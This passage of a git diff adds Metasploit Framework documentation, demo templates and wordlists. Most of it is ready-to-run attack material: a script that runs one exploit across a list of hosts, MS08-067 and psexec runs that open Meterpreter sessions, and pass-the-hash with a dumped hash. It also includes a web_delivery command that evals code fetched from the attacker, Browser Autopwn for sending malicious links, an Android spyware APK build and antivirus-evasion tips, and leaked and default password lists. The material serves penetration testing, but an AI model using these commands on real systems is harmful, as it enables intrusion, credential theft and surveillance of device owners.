+pre .at_rule, +pre .at_rule .keyword { + color: #088; +} + +pre .at_rule .preprocessor { + color: #808; +} + +pre .scss .tag, +pre .scss .attribute { + color: #339; +} \ No newline at end of file diff --git a/data/markdown_doc/payload_demo_template.erb b/data/markdown_doc/payload_demo_template.erb new file mode 100644 index 0000000000..ff6620a3aa --- /dev/null +++ b/data/markdown_doc/payload_demo_template.erb @@ -0,0 +1,8 @@ +``` +msf > use <%= mod.fullname %> +msf <%= mod.type %>(<%= mod.shortname %>) > show options + ... show and set options ... +msf <%= mod.type %>(<%= mod.shortname %>) > generate +``` + +To learn how to generate <%= mod.fullname %> with msfvenom, please [read this](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom). \ No newline at end of file diff --git a/data/markdown_doc/post_demo_template.erb b/data/markdown_doc/post_demo_template.erb new file mode 100644 index 0000000000..a934269b06 --- /dev/null +++ b/data/markdown_doc/post_demo_template.erb @@ -0,0 +1,44 @@ +There are two ways to execute this post module. + +**From the Meterpreter prompt** + +The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post +module against that specific session: + +``` +meterpreter > run <%= mod.fullname %> +``` + +**From the msf prompt** + +The second is by using the "use" command at the msf prompt. You will have to figure out which +session ID to set manually. To list all session IDs, you can use the "sessions" command. + + +``` +msf > use <%= mod.fullname %> +msf <%= mod.type %>(<%= mod.shortname %>) > show options + ... show and set options ... +msf <%= mod.type %>(<%= mod.shortname %>) > set SESSION session-id +msf <%= mod.type %>(<%= mod.shortname %>) > exploit +``` + +If you wish to run the post against all sessions from framework, here is how: + +1 - Create the following resource script: + +``` + +framework.sessions.each_pair do |sid, session| + run_single("use <%= mod.fullname %>") + run_single("set SESSION #{sid}") + run_single("run") +end + +``` + +2 - At the msf prompt, execute the above resource script: + +``` +msf > resource path-to-resource-script +``` \ No newline at end of file diff --git a/data/markdown_doc/remote_exploit_demo_template.erb b/data/markdown_doc/remote_exploit_demo_template.erb new file mode 100644 index 0000000000..ea72c5480f --- /dev/null +++ b/data/markdown_doc/remote_exploit_demo_template.erb @@ -0,0 +1,99 @@ +**Using <%= mod.shortname %> against a single host** + +Normally, you can use <%= mod.fullname %> this way: + +``` +msf > use <%= mod.fullname %> +msf <%= mod.type %>(<%= mod.shortname %>) > show targets + ... a list of targets ... +msf <%= mod.type %>(<%= mod.shortname %>) > set TARGET target-id +msf <%= mod.type %>(<%= mod.shortname %>) > show options + ... show and set options ... +msf <%= mod.type %>(<%= mod.shortname %>) > exploit +``` + +**Using <%= mod.shortname %> against multiple hosts** + +But it looks like this is a remote exploit module, which means you can also engage multiple hosts. + +First, create a list of IPs you wish to exploit with this module. One IP per line. + +Second, set up a background payload listener. This payload should be the same as the one your +<%= mod.shortname %> will be using: + +1. Do: ```use exploit/multi/handler``` +2. Do: ```set PAYLOAD [payload]``` +3. Set other options required by the payload +4. Do: ```set EXITONSESSION false``` +5. Do: ```run -j``` + +At this point, you should have a payload listening. + +Next, create the following script. Notice you will probably need to modify the ip_list path, and +payload options accordingly: + +``` +<ruby> +# +# Modify the path if necessary +# +ip_list = '/tmp/ip_list.txt' + +File.open(ip_list, 'rb').each_line do |ip| + print_status("Trying against #{ip}") + run_single("use <%= mod.fullname %>") + run_single("set RHOST #{ip}") + run_single("set DisablePayloadHandler true") + + # + # Set a payload that's the same as the handler. + # You might also need to add more run_single commands to configure other + # payload options. + # + run_single("set PAYLOAD [payload name]") + + run_single("run") +end +</ruby> +``` + +Next, run the resource script in the console: + +``` +msf > resource [path-to-resource-script] +``` + +And finally, you should see that the exploit is trying against those hosts similar to the following +MS08-067 example: + +``` +msf > resource /tmp/exploit_hosts.rc +[*] Processing /tmp/exploit_hosts.rc for ERB directives. +[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes) +[*] Trying against 192.168.1.80 + +RHOST => 192.168.1.80 +DisablePayloadHandler => true +PAYLOAD => windows/meterpreter/reverse_tcp +LHOST => 192.168.1.199 + +[*] 192.168.1.80:445 - Automatically detecting the target... +[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English +[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX) +[*] 192.168.1.80:445 - Attempting to trigger the vulnerability... +[*] Sending stage (957999 bytes) to 192.168.1.80 +[*] Trying against 192.168.1.109 +RHOST => 192.168.1.109 +DisablePayloadHandler => true +PAYLOAD => windows/meterpreter/reverse_tcp +LHOST => 192.168.1.199 +[*] 192.168.1.109:445 - Automatically detecting the target... +[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown +[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English +[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX) +[*] 192.168.1.109:445 - Attempting to trigger the vulnerability... +[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600 + +[*] Sending stage (957999 bytes) to 192.168.1.109 +[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600 +``` diff --git a/data/wordlists/adobe_top100_pass.txt b/data/wordlists/adobe_top100_pass.txt new file mode 100644 index 0000000000..f7d2a744be --- /dev/null +++ b/data/wordlists/adobe_top100_pass.txt @@ -0,0 +1,100 @@ +123456 +123456789 +password +adobe123 +12345678 +qwerty +1234567 +111111 +photoshop +123123 +1234567890 +000000 +abc123 +1234 +adobe1 +macromedia +azerty +iloveyou +aaaaaa +654321 +12345 +666666 +sunshine +123321 +letmein +monkey +asdfgh +password1 +shadow +princess +dragon +adobeadobe +daniel +computer +michael +121212 +charlie +master +superman +qwertyuiop +112233 +asdfasdf +jessica +1q2w3e4r +welcome +1qaz2wsx +987654321 +fdsa +753951 +chocolate +fuckyou +soccer +tigger +asdasd +thomas +asdfghjkl +internet +michelle +football +123qwe +zxcvbnm +dreamweaver +7777777 +maggie +qazwsx +baseball +jennifer +jordan +abcd1234 +trustno1 +buster +555555 +liverpool +abc +whatever +11111111 +102030 +123123123 +andrea +pepper +nicole +killer +abcdef +hannah +test +alexander +andrew +222222 +joshua +freedom +samsung +asdfghj +purple +ginger +123654 +matrix +secret +summer +1q2w3e +snoopy1 diff --git a/data/wordlists/sap_default.txt b/data/wordlists/sap_default.txt index 3f7a5321c3..752eb03d2b 100644 --- a/data/wordlists/sap_default.txt +++ b/data/wordlists/sap_default.txt @@ -16,4 +16,12 @@ SAPJSF ch4ngeme SAPR3 SAP CTB_ADMIN sap123 XMI_DEMO sap123 - +IDEADM admin +SMD_ADMIN init1234 +SMD_BI_RFC init1234 +SMD_RFC init1234 +SOLMAN_ADMIN init1234 +SOLMAN_BTC init1234 +SAPSUPPORT init1234 +CONTENTSERV init1234 +SMD_AGT init1234 diff --git a/documentation/modules/auxiliary/scanner/http/tomcat_mgr_login.md b/documentation/modules/auxiliary/scanner/http/tomcat_mgr_login.md new file mode 100644 index 0000000000..9db11819dd --- /dev/null +++ b/documentation/modules/auxiliary/scanner/http/tomcat_mgr_login.md @@ -0,0 +1,41 @@ +The auxiliary/scanner/http/tomcat_mgr_login works for Tomcat versions that uses HTTP +authentication. + +Please note that for Tomcat 7 or newer, the roles required to use the manager application were +changed from the single manager role to the following four roles: + +* manager-gui - Allows access to the HTML GUI and the status pages. +* manager-script - Allows access to the text interface and the status pages. +* manager-jmx - Allows access to the JMX and the status pages. +* manager-status - allows access to the status pages only. + +Older versions of Tomcat came with default passwords enabled by default. For example: + +**Tomcat 4** + +| Username | Password | Role | +| -------- | -------- | ------------- | +| tomcat | tomcat | tomcat | +| role1 | tomcat | role1 | +| both | tomcat | tomcat, role1 | + +**Tomcat 5** + +Same as Tomcat 4 + +Newer Tomcat versions have these passwords commented out. + +If you are using the default Metasploit credential lists, these usernames and passwords are already +loaded. + + +## Vulnerable Application + +To download the vulnerable application, you can find it here: https://tomcat.apache.org/whichversion.html. + +## Verification Steps + +1. Do: ```auxiliary/scanner/http/tomcat_mgr_login``` +2. Do: ```set RHOSTS [IP]``` +3. Set TARGETURI if necessary. +4. Do: ```run``` diff --git a/documentation/modules/auxiliary/scanner/smb/smb_login.md b/documentation/modules/auxiliary/scanner/smb/smb_login.md new file mode 100644 index 0000000000..b2f9b7903a --- /dev/null +++ b/documentation/modules/auxiliary/scanner/smb/smb_login.md @@ -0,0 +1,117 @@ +The smb_login module is used to bruteforce SMB remotely. SMB credentials are extra valuable because they are system credentials, and you can probably reuse some of them to log in to more machines. + +## Vulnerable Application + +To use smb_login, make sure you are able to connect to a SMB service that supports SMBv1. + +## Verification Steps + +The following demonstrates a basic scenario of using the [built-in wordlists](https://github.com/rapid7/metasploit-framework/tree/master/data/wordlists) to brute-force SMB: + +``` +msf > use auxiliary/scanner/smb/smb_login +msf auxiliary(smb_login) > set RHOSTS 192.168.1.80 +RHOSTS => 192.168.1.80 +msf auxiliary(smb_login) > set USER_FILE /Users/wchen/rapid7/msf/data/wordlists/unix_users.txt +USER_FILE => /Users/wchen/rapid7/msf/data/wordlists/unix_users.txt +msf auxiliary(smb_login) > set PASS_FILE /Users/wchen/rapid7/msf/data/wordlists/unix_passwords.txt +PASS_FILE => /Users/wchen/rapid7/msf/data/wordlists/unix_passwords.txt +msf auxiliary(smb_login) > run + +[+] 192.168.1.80:445 - 192.168.1.80:445 SMB - Success: '.\root:monkey' Administrator +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed +msf auxiliary(smb_login) > +``` + +If you have a database connected, you should also see this credential logged: + +``` +msf auxiliary(smb_login) > creds +Credentials +=========== + +host origin service public private realm private_type +---- ------ ------- ------ ------- ----- ------------ +192.168.1.80 192.168.1.80 445/tcp (smb) root monkey Password + +msf auxiliary(smb_login) +``` + +## Options + +By default, the smb_login module only requires the RHOSTS option to run. But in reality, you will +also need to supply user names and passwords. The following options are available to support +different credential formats: + +**The USER_FILE option** + +If you happen to manage all the found user names in a separate file, then this option would be +suitable for that. One per line. + +An example of setting USER_FILE: + +``` +set USER_FILE [path to file] +``` + +**The PASS_FILE option** + +If you happen to manage all the found passwords in a separate file, then this option would be +suitable for that. One per line. + +``` +set PASS_FILE [path to file] +``` + +**The USERPASS_FILE option** + +If each user should be using a specific password in your file, then you can use this option. One +username/password per line: + +``` +set USERPASS_FILE [path to file] +``` + +**The DB_ALL_CREDS option** + +This option allows you to reuse all the user names and passwords collected by the database: + +``` +set DB_ALL_CREDS true +``` + +**The DB_ALL_PASS option** + +This option allows you to reuse all the passwords collected by the database. + +``` +set DB_ALL_PASS true +``` + +**The DB_ALL_USERS option** + +This option allows you to reuse all the user names collected by the database. + +``` +set DB_ALL_USERS true +``` + +**The SMBUser option** + +If you are testing a specific user, use this option. + +``` +set SMBUser [user name] +``` + +**The SMBPass option** + +If you are testing a specific password, use this option. + +``` +set SMBPass [password] +``` + +Note: If an account has been successfully brute-forced, that account will not be tried again. + diff --git a/documentation/modules/auxiliary/server/browser_autopwn2.md b/documentation/modules/auxiliary/server/browser_autopwn2.md new file mode 100644 index 0000000000..c09b71ff47 --- /dev/null +++ b/documentation/modules/auxiliary/server/browser_autopwn2.md @@ -0,0 +1,176 @@ +Browser Autopwn 2 is a complete redesign from the first one, so quite a few things will look and +feel different for you. Here are the features you should know about before using. + +## Vulnerable Applications + +Browser Autopwn 2 is capable of targeting popular browsers and 3rd party plugins, such as: + +* Internet Explorer +* Mozilla Firefox +* Adobe Flash +* Java +* ActiveX +* Silverlight + +## Exploit URLs + +Normally, the only URL you need to care about is the **BrowserAutoPwn URL**. This is the URL +you should send to the targets you wish to attack. + +For debugging purposes, you can also see each browser exploit's specific URL path. You can do so +by setting the VERBOSE option to true in msfconsole, like this: + +``` +set VERBOSE true +``` + +And then when you run the module, there will be a list showing all the exploits that might be +used, including the URLs. + +## Browser Autopwn 2 Options + +**The HTMLContent Option** + +The HTMLContent option allows you to serve a basic HTML web page to the browser instead of having a +blank one. It supports two syntaxes. + +This example will basically print "Hello world!" on the browser while exploits are tested against +it. + +``` +set HTMLContent Hello world! +``` + +This example will load file /tmp/hello_world.html and that's what the browser will see. Most likely +the second syntax is how you'd want to use the Content option. + +Keep in mind that you should probably try to keep HTMLContent as simple as possible, otherwise +there is a possibility that it might actually influence the reliability of the exploits, especially +the ones that do memory corruption. + +**The EXCLUDE_PATTERN option** + +The EXCLUDE_PATTERN option is used for excluding exploit file names you don't want Browser +Autopwn 2 to use. This is a regex type option, you can be creative about this. + +For example, Adobe Flash exploits in Metasploit tend to have the same file name that begins with: +"adobe_flash_", so to exclude those, you can do: + +``` +set EXCLUDE_PATTERN adobe_flash +``` + +**The INCLUDE_PATTERN option** + +The INCLUDE_PATTERN option is for loading specific exploits that you want Browser Autopwn 2 to use. +Let's reuse the Adobe Flash file name example, if you only want Flash exploits, you can do: + +``` +set INCLUDE_PATTERN adobe_flash +``` + +If you set both INCLUDE_PATTERN and EXCLUDE_PATTERN, the evaluation for INCLUDE_PATTERN will kick +in first, followed by EXCLUDE_PATTERN. + +**The MaxExploitCount option** + +The MaxExploitCount option is for specifying how many exploits you want Browser Autopwn 2 to load. +By default, it's 21. But you can try to bump it up a little bit if you wish to try more exploits. +Note that by doing so you are also allowing more lower ranking modules to kick in, you will have +to figure out the sweet spot for it. An example of setting it: + +``` +set MaxExploitCount 30 +``` + +**The MaxSessionCount option** + +The MaxSessionCount option is for limiting how many sessions to get. It may sound a little odd at +first because why would you want to do that, right? Well, a use case for this is when you don't +actually want to pop shells, instead you just want to know what exploits could be used, this is +something you can try. You can also use this if you don't want your attack to stay open the whole +time: + +``` +set MaxSessionCount 10 +``` + +**The ShowExploitList option** + +The ShowExploitList option means displaying a list of exploits specific to each browser/client. +As we've explained before, when BAP2 loads 21 exploits, probably not all 21 will be served to +the browser, only some of them. In order to see those ones, you need to set this option: + +``` +set ShowExploitList true +``` + +**The AllowedAddresses option** + +The AllowedAddresses option is for attacking a specific range of IPs as a way to avoid penetration +testing accidents. For example, when you send a malicious link to a specific person, that person +may actually share it with his friends, family or other people, and those people aren't your +targets so you shouldn't hit them. Well, Browser Autopwn doesn't know that, so one of the ways to +avoid that is to create a whitelist. + +The option also supports two syntaxes. This is most likely how you will set it: + +``` +set AllowedAddresses file:///tmp/ip_list.txt +``` + +The above will load file ip_list.txt. In that file, one IP per line. + + +**The ExploitReloadTimeout option** + +The ExploitReloadTimeout is for setting how long BAP2 should wait before loading the next exploit. +By default, it's 3 seconds, but in case some exploits need more time (for example, longer time to +groom the heap, load other things, or it's doing a sleep somewhere), you will need to set this. +In most cases, you shouldn't have to. + +Here's an example of setting it to 5 seconds: + +``` +set ExploitReloadTimeout 5000 +``` + +## Scenarios + +By default, Browser Autopwn 2 goes through the entire exploit module tree, and will try to use +different types of exploits - Firefox, Internet Explorer, Adobe Flash, Android, etc. If you want to +test a specific application, basically all you need to do is setting the +INCLUDE_PATTERN option (or maybe EXCLUDE_PATTERN). + +However, there is another trick to make this task even easier. BAP2 also comes with the following +resource scripts that can automatically do this: + +* bap_firefox_only.rc - For testing Firefox +* bap_flash_only.rc - Fore testing Adobe Flash +* bap_ie_only.rc - For testing Internet Explorer +* bap_dryrun_only.rc - Rickrolls the target, and shows you all the suitable exploits against that target. No exploits will actually be fired. + +Here's an example of using bap_flash_only.rc to test Adobe Flash vulnerabilities: + +``` +$ ./msfconsole -q -r scripts/resource/bap_flash_only.rc +``` + +## Logging + +In addition, when a browser connects to BAP, this link-clicking event is also logged to the +database as a "bap.clicks" note type. If the ShowExploitList option is set to true, that will also +save the exploit list information so that after testing you can go back to the database and see +which users are vulnerable to what exploits. + +Even if you don't set the ShowExploitList option, the logged link-clicking event data is more than +enough to prove that the user was social-engineered, which is still a security risk. + +To see all the bap.clicks events, in msfconsole do: + +``` +notes -t bap.clicks +``` + +From there, you can do additional analysis of these notes, put it on your report, and hopefully +do something about it. diff --git a/documentation/modules/exploit/multi/script/web_delivery.md b/documentation/modules/exploit/multi/script/web_delivery.md new file mode 100644 index 0000000000..91c213f82d --- /dev/null +++ b/documentation/modules/exploit/multi/script/web_delivery.md @@ -0,0 +1,76 @@ +As a web server, the web_delivery module provides a stealthy way to deliver a payload during post exploitation because the payload does not touch the disk. + +Currently, web_delivery supports three different languages for delivery: Python, PHP, and +Powershell. You should be able to tell which one you can use based on the target environment +you are in. + +For example, if you gained access through a PHP application, it's safe to assume you can use PHP. If you're in a Windows server, such as Windows Server 2008, then it's probably safe to say the target supports Powershell. + +## Verification Steps + +To be able to use the web_delivery module, you must gain access to the target machine first, with the ability to execute either the Python, or PHP, or Powershell interpreter. + +At that point, you would use the web_delivery module like in the following example: + +1. Start msfconsole +2. Run: ```use exploit/multi/script/web_delivery``` +3. Run: ```set target 1``` (1 is PHP. You can use ```show targets``` to see other options) +4. Run: ```set PAYLOAD php/meterpreter/reverse_tcp``` (You can do ```show payloads``` to see what options are suitable for the target) +5. Run: ```set LHOST IP``` (The IP the payload should connect back to) +6. Do: ```run``` +7. At this point, a handler is up for that payload, and the module should instruct you to execute a command. +8. Copy the command. Depending on your pentesting scenario, you can either inject the + command and get code execution, or run it from the target's shell and get a session: + +``` +msf exploit(web_delivery) > run +[*] Exploit running as background job. + +[*] Started reverse TCP handler on 172.16.23.1:4444 +msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8080/z5inGkwCCQiz9 +[*] Local IP: http://10.6.0.86:8080/z5inGkwCCQiz9 +[*] Server started. +[*] Run the following command on the target machine: +php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.23.1:8080/z5inGkwCCQiz9'));" +[*] Delivering Payload +[*] Sending stage (33684 bytes) to 172.16.23.134 +[*] Meterpreter session 1 opened (172.16.23.1:4444 -> 172.16.23.134:41684) at 2016-03-02 11:41:34 -0600 +``` + +## Targets + +**Python** + +Python is a fairly popular language, especially on Unix-based systems. By default, it has come with Ubuntu Linux since 8.04, as well as Debian, and Mac OS X since 10.3. + +**PHP** + +PHP is a fairly popular language for web servers, especially Apache. + +**Powershell/Windows** + +Powershell is a popular language for newer Windows systems. Windows 7 and Windows Server 2008 R2 +are the first Windows versions to come with Powershell by default. Older Windows systems such as XP +don't come with it by default, but it is still possible to see it installed on a corporate network. + +## Scenarios + +**Against a compromised web application** + +web_delivery would work nicely for a web application with a command execution vulnerability. + +One way to approach this would be: + +1. Start exploit/multi/script/web_delivery +2. Use [Burp Suite](https://portswigger.net/burp/) to intercept the HTTP/HTTPS request, place the command in the parameter that results in arbitrary code execution. +3. Hopefully the modified HTTP/HTTPS request is successful, and you should get a session. + +**Shell upgrade** + +web_delivery is also useful to upgrade a shell type payload to a Meterpreter one. + +Here's how that can be done: + +1. Start exploit/multi/script/web_delivery that generates/ +2. In msfconsole, interact with the shell, and copy/paste the command. +3. You should get a Meterpreter session. diff --git a/documentation/modules/exploit/windows/smb/ms08_067_netapi.md b/documentation/modules/exploit/windows/smb/ms08_067_netapi.md new file mode 100644 index 0000000000..6af5b746ad --- /dev/null +++ b/documentation/modules/exploit/windows/smb/ms08_067_netapi.md @@ -0,0 +1,59 @@ +ms08_067_netapi is one of the most popular remote exploits against Microsoft Windows. It is +considered a reliable exploit, and allows you to gain access as SYSTEM - the highest Windows +privilege. In modern day penetration test, this exploit would most likely be used in an internal +environment, and not so much from external due to the likelihood of a firewall. + +The check command of ms08_067_netapi is also highly accurate, because it is actually testing the +vulnerable code path, not just passively. + + +## Vulnerable Application + +This exploit works against a vulnerable SMB service from one of these Windows systems: + +* Windows 2000 +* Windows XP +* Windows 2003 + +To reliability determine whether the machine is vulnerable, you will have to either examine +the system's patch level, or use a vulnerability check. + +## Verification Steps + +Please see Basic Usage under Overview. + +## Options + +Please see Required Options under Overview. + +## Scenarios + +**Failure to detect the language pack** + +On some Windows systems, ms08_067_netapi (as well as other SMB modules) might show you this +message: + + +> Windows 2003 R2 Service Pack 2 - lang:Unknown + + +This is because the targeted system does not allow itself to be enumerated without authentication. +In this case, either you can set the username and password to be able to use automatic detection, +like this: + +``` +set SMBUSER [username] +set SMBPASS [password] +``` + +Or you must manually set the target with the correct language, for example: + +``` +set target [target ID] +``` + +**Unsafe configuration of LHOST** + +Although ms08_067_netapi is reliable enough for a memory corruption exploit, it has its own +denial-of-service moments. One scenario is when the LHOST option is incorrectly configured, +which could result the SMB to crash. diff --git a/documentation/modules/exploit/windows/smb/psexec.md b/documentation/modules/exploit/windows/smb/psexec.md new file mode 100644 index 0000000000..de541f95b7 --- /dev/null +++ b/documentation/modules/exploit/windows/smb/psexec.md @@ -0,0 +1,120 @@ +psexec is one of the most popular exploits against Microsoft Windows. It is a great way to test password security and demonstrate how a stolen password could lead to a complete compromise of an entire corporate network. + +The Metasploit Framework actually includes different module types of psexec for different scenarios. exploit/windows/smb/psexec is the father of them all and is used the same way +you normally would with any Metasploit exploits. + + +## Vulnerable Application + +To be able to use exploit/windows/smb/psexec: + +1. You must have a valid username/password. +2. The firewall must allow SMB traffic. +3. The target must use SMBv1. +4. The remote Windows machine's network security policy must allow it. If you see [one of these errors](https://github.com/rapid7/metasploit-framework/wiki/What-does-my-Rex%3A%3AProto%3A%3ASMB-Error-mean%3F), then the Windows machine does not allow it. + +## Verification Steps + +At the minimum, you should be able use psexec to get a session with a valid credential using the following: + +``` +msf > use exploit/windows/smb/psexec +msf exploit(psexec) > set RHOST 192.168.1.80 +RHOST => 192.168.1.80 +msf exploit(psexec) > set SMBUser Administrator +SMBUser => Administrator +msf exploit(psexec) > set SMBPass goodpass +SMBPass => goodpass +msf exploit(psexec) > exploit + +[*] Started reverse TCP handler on 192.168.1.199:4444 +[*] 192.168.1.80:445 - Connecting to the server... +[*] 192.168.1.80:445 - Authenticating to 192.168.1.80:445 as user 'Administrator'... +[*] 192.168.1.80:445 - Selecting native target +[*] 192.168.1.80:445 - Uploading payload... +[*] 192.168.1.80:445 - Created \PTIhqIrQ.exe... +[+] 192.168.1.80:445 - Service started successfully... +[*] 192.168.1.80:445 - Deleting \PTIhqIrQ.exe... +[*] Sending stage (957999 bytes) to 192.168.1.80 +[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1042) at 2016-03-01 16:51:56 -0600 + +meterpreter > +``` + +## Options + +By default, using exploit/windows/smb/psexec can be as simple as setting the RHOST option, and you're ready to go. But in reality, you will probably need to at least configure: + +**The SMBUser Option** + +This is a valid Windows username. + +**The SMBPass option** + +This can be either the plain text version or the Windows hash. + +## Scenarios + + +**Pass the Hash** + +One common penetration testing scenario using psexec is that attackers usually begin by breaking into a box, dumping the hashes, and using some of those hashes to log into other boxes on the network using psexec. So in that scenario, with the following stolen hash: + +``` +meterpreter > hashdump +Administrator:500:e39baff0f2c5fd4e93e28745b8bf4ba6:f4974ee4a935ee160a927eafbb3f317f::: +``` + +You can simply copy and paste it to the SMBPass option in psexec and get a session without needing to crack the hash: + +``` +msf > use exploit/windows/smb/psexec +msf exploit(psexec) > set SMBUser Administrator +SMBUser => Administrator +msf exploit(psexec) > set SMBPass e39baff0f2c5fd4e93e28745b8bf4ba6:f4974ee4a935ee160a927eafbb3f317f +SMBPass => e39baff0f2c5fd4e93e28745b8bf4ba6:f4974ee4a935ee160a927eafbb3f317f +msf exploit(psexec) > set RHOST 192.168.1.80 +RHOST => 192.168.1.80 +msf exploit(psexec) > exploit + +[*] Started reverse TCP handler on 192.168.1.199:4444 +[*] 192.168.1.80:445 - Connecting to the server... +[*] 192.168.1.80:445 - Authenticating to 192.168.1.80:445 as user 'Administrator'... +[*] 192.168.1.80:445 - Selecting native target +[*] 192.168.1.80:445 - Uploading payload... +[*] 192.168.1.80:445 - Created \QpxKDHyG.exe... +[+] 192.168.1.80:445 - Service started successfully... +[*] 192.168.1.80:445 - Deleting \QpxKDHyG.exe... +[*] Sending stage (957999 bytes) to 192.168.1.80 +[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1043) at 2016-03-01 17:02:46 -0600 + +meterpreter > +``` + +**Automatic Target** + +There are multiple targets available for exploit/windows/smb/psexec. The Automatic target is the default target. If the Automatic target detects Powershell on the remote machine, it will try Powershell, otherwise it uses the natvie upload. Each target is explained below. + +**Powershell Target** + +The Powershell target forces the psexec module to run a Powershell command with a payload embedded in it. Since this approach does not leave anything on disk, it is a very powerful way to evade antivirus. However, older Windows machines might not support Powershell by default. + +Because of this, you will probably want to use the Automatic target setting. The automatic mode will check if the target supports Powershell before it tries it; the manually set Powershell target won't do that. + +**Native Upload Target** + +The Native target will attempt to upload the payload (executable) to SYSTEM32 (which can be modified with the +SHARE datastore option), and then execute it with psexec. + +This approach is generally reliable, but has a high chance of getting caught by antivirus on the target. To counter this, you can try to use a template by setting the EXE::Path and EXE::Template datastore options. Or, you can supply your own custom EXE by setting the EXE::Custom option. + +**MOF Upload Target** + +The [MOF](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-WbemExec-for-a-write-privilege-attack-on-Windows) target technically does not use psexec; it does not explicitly tell Windows to execute anything. All it does is upload two files: the payload (exe) in SYSTEM32 and a managed object +format file in SYSTEM32\wbem\mof\ directory. When Windows sees the MOF file in that directory, it automatically runs it. Once executed, the code inside the MOF file basically tells Windows to execute our payload in SYSTEM32, and you get a session. + +Although it's a neat trick, Metasploit's MOF library only works against Windows XP and Windows Server 2003. And since it writes files to disk, there is also a high chance of getting +caught by antivirus on the target. + +The best way to counter antivirus is still the same. You can either use a different template by setting the EXE::Path and EXE::Template datastore options or you can supply your own custom EXE by setting the EXE::Custom option. + diff --git a/documentation/modules/module_doc_template.md b/documentation/modules/module_doc_template.md new file mode 100644 index 0000000000..aa1e134161 --- /dev/null +++ b/documentation/modules/module_doc_template.md @@ -0,0 +1,41 @@ +The following is the recommended format for module documentation. +But feel free to add more content/sections to this. + + +## Vulnerable Application + + Instructions to get the vulnerable application. + +## Verification Steps + + Example steps in this format: + + 1. Install the application + 2. Start msfconsole + 3. Do: ```use [module path]``` + 4. Do: ```run``` + 5. You should get a shell. + +## Options + + **Option name** + + Talk about what it does, and how to use it appropriately. + +## Scenarios + + Specific demo of using the module that might be useful in a real world scenario. + + ``` + code or console output + ``` + + For example: + + To do this specific thing, here's how you do it: + + ``` + msf > use module_name + msf auxiliary(module_name) > set POWERLEVEL >9000 + msf auxiliary(module_name) > exploit + ``` \ No newline at end of file diff --git a/documentation/modules/payload/android/meterpreter/reverse_tcp.md b/documentation/modules/payload/android/meterpreter/reverse_tcp.md new file mode 100644 index 0000000000..cde18f507f --- /dev/null +++ b/documentation/modules/payload/android/meterpreter/reverse_tcp.md @@ -0,0 +1,457 @@ +The android/meterpreter/reverse_tcp payload is a Java-based Meterpreter that can be used on an +Android device. It is still at an early stage of development, but there are so many things you can +do with it already. + +The Android Meterpreter allows you to do things like take remote control the file system, listen to phone calls, retrieve or send SMS messages, geo-locate the user, run post-exploitation modules, etc. + +## Vulnerable Application + +You can test android/meterpreter/reverse_tcp on these devices: + +**Android Emulator** + +An emulator is the most convenient way to test Android Meterpreter. You can try: + +* [Android SDK](http://developer.android.com/sdk/index.html#Other) - Creates and manages your emulators from a command prompt or terminal. +* [Android Studio](http://developer.android.com/sdk/installing/index.html?pkg=studio) - Allows you to manage emulators more easily than the SDK. +* [GenyMotion](https://www.genymotion.com/download/) - Requires an account. +* [AndroidAVDRepo](https://github.com/dral3x/AndroidAVDRepo) - Contains a collection of pre-configured emulators. + + +**A real Android device** + +Having a real Android device allows you to test features or vulnerabilities you don't necessarily +have from an emulator, which might be specific to a manufacturer, carrier, or hardware. You also +get to test it over a real network. + + +## Verification Steps + +Currently, the most common way to use Android Meterpreter is to create it as an APK, and then +execute it. + +To create the APK with msfconsole: + +``` +msf > use payload/android/meterpreter/reverse_tcp +msf payload(reverse_tcp) > set LHOST 192.168.1.199 +LHOST => 192.168.1.199 +msf payload(reverse_tcp) > generate -t raw -f /tmp/android.apk +[*] Writing 8992 bytes to /tmp/android.apk... +msf payload(reverse_tcp) > +``` + +To create the APK with msfvenom: + +``` +./msfvenom -p android/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk +``` + +Next, start an Android device. Upload the APK, and execute it. There are different ways to do this, +so please refer to the Scenarios section for more information. + +## Important Basic Commands + +**pwd** + +The ```pwd``` command allows you to see the current directory you're in. + +``` +meterpreter > pwd +/data/data/com.metasploit.stage +``` + +**cd** + +The ```cd``` command allows you to change directory. For example: + +``` +meterpreter > cd cache +meterpreter > ls +``` + +**cat** + +The ```cat``` command allows you to see the contents of a file. + +**ls** + +The ```ls``` command displays items in a directory. For example: + +``` +meterpreter > ls +Listing: /data/data/com.metasploit.stage/files +============================================== + +Mode Size Type Last modified Name +---- ---- ---- ------------- ---- +100444/r--r--r-- 0 fil 2016-03-08 14:56:08 -0600 rList-com.metasploit.stage.MainActivity +``` + +**upload** + +The ```upload``` command allows you to upload a file to the remote target. The ```-r``` option +allows you to do so recursively. + +**download** + +The ```download``` command allows you to download a file from the remote target. The ```-r``` +option allows you to do so recursively. + +**search** + +The ```search``` command allows you to find files on the remote target. For example: + +``` +meterpreter > search -d . -f *.txt +``` + +**ifconfig** + +The ```ifconfig``` command displays the network interfaces on the remote machine. + +``` +meterpreter > ifconfig + +... + +Interface 10 +============ +Name : wlan0 - wlan0 +Hardware MAC : 60:f1:89:07:c2:7e +IPv4 Address : 192.168.1.207 +IPv4 Netmask : 255.255.255.0 +IPv6 Address : 2602:30a:2c51:e660:62f1:89ff:fe07:c27e +IPv6 Netmask : :: +IPv6 Address : fe80::62f1:89ff:fe07:c27e +IPv6 Netmask : :: +IPv6 Address : 2602:30a:2c51:e660:81ae:6bbd:e0e1:5954 +IPv6 Netmask : :: + +... +``` + +**getuid** + +The ```getuid``` command shows the current user that the payload is running as: + +``` 